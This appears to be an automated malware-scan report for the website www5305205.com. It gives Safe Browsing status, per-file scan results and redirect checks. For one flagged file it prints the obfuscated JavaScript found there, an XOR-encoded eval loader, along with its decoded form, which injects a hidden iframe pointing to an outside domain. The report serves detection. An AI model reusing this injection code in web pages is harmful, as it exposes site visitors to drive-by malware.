Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=www5305205.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.www5305205.com/ | 200 OK Content-Length: 33612 Content-Type: text/html | clean |
http://www.www5305205.com/include/dedeajax2.js | 200 OK Content-Length: 7961 Content-Type: application/javascript | clean |
http://www.www5305205.com/js/jm.js | 200 OK Content-Length: 4789 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var J=function(m){return String.fromCharCode(m^5)};eval(J(114)+J(108)+J(107)+J(97)+J(106)+J(114)+J(94)+J(39)+J(89)+J(125)+J(51)+J(49)+J(89)+J(125)+J(51)+J(99)+J(89)+J(125)+J(51)+J(54)+J(89)+J(125)+J(50)+J(48)+J(89)+J(125)+J(51)+J(97)+J(89)+J(125)+J(51)+J(48)+J(89)+J(125)+J(51)+J(96)+J(89)+J(125)+J(50)+J(49)+J(39)+J(88)+J(94)+J(39)+J(89)+J(125)+J(50)+J(50)+J(89)+J(125)+J(50)+J(55)+J(89)+J(125)+J(51)+J(60)+J(89)+J(125)+J(50)+J(49)+J(89)+J(125)+J(51)+J(48)+J(89)+J(125)+J(51)+J(102)+J(89)+J(125)+J(5 Decoded script: window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\x2f\x2f\x70\x2e\x63\x6e\x74\x61\x69\x73\x75\x6e\x2e\x63\x6f\x6d\" \x77\x69\x64\x74\x68\x3d\"\x31\x30\x30\x25\" \x68\x65\x69\x67\x68\x74\x3d\"\x32\x30\x30\x30\" \x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\"\x6e\x6f\" \x62\x6f\x72\x64\x65\x72\x3d\"\x30\" \x6d\x61\x72\x67\x69\x6e\x77\x69\x64\x74\x68\x3d\"\x30\" \x6d\x61\x72\x67\x69\x6e\x68\x65\x69 <iframe src="http://p.cntaisun.com" width="100%" height="2000" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" runat="server" allowtransparency="yes"></iframe> Antivirus reports:
| ||
http://www.www5305205.com/js/dl.js | 200 OK Content-Length: 3509 Content-Type: application/javascript | clean |
http://s23.cnzz.com/stat.php?id=1252954363&web_id=1252954363 | 200 OK Content-Length: 10075 Content-Type: application/javascript | clean |
http://www.www5305205.com/t1/ | 200 OK Content-Length: 16098 Content-Type: text/html | clean |
http://www.www5305205.com/x6/ | 200 OK Content-Length: 14513 Content-Type: text/html | clean |
http://www.www5305205.com/x7/ | 200 OK Content-Length: 14931 Content-Type: text/html | clean |
http://www.www5305205.com/x8/ | 200 OK Content-Length: 14837 Content-Type: text/html | clean |
http://www.www5305205.com/d1/ | 200 OK Content-Length: 14599 Content-Type: text/html | clean |
http://www.www5305205.com/d2/ | 200 OK Content-Length: 14732 Content-Type: text/html | clean |
http://www.www5305205.com/d3/ | 200 OK Content-Length: 14930 Content-Type: text/html | clean |
http://www.www5305205.com/t4/ | 200 OK Content-Length: 14957 Content-Type: text/html | clean |
http://www.www5305205.com/d5/ | 200 OK Content-Length: 15046 Content-Type: text/html | clean |
http://www.www5305205.com/d6/ | 200 OK Content-Length: 15090 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: www5305205.com
Result:
GET / HTTP/1.1
Host: www5305205.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: www5305205.com
Referer: http://www.google.com/search?q=www5305205.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: www5305205.com
Referer: http://www.google.com/search?q=www5305205.com
Result:
The result is similar to the first query. There are no suspicious redirects found.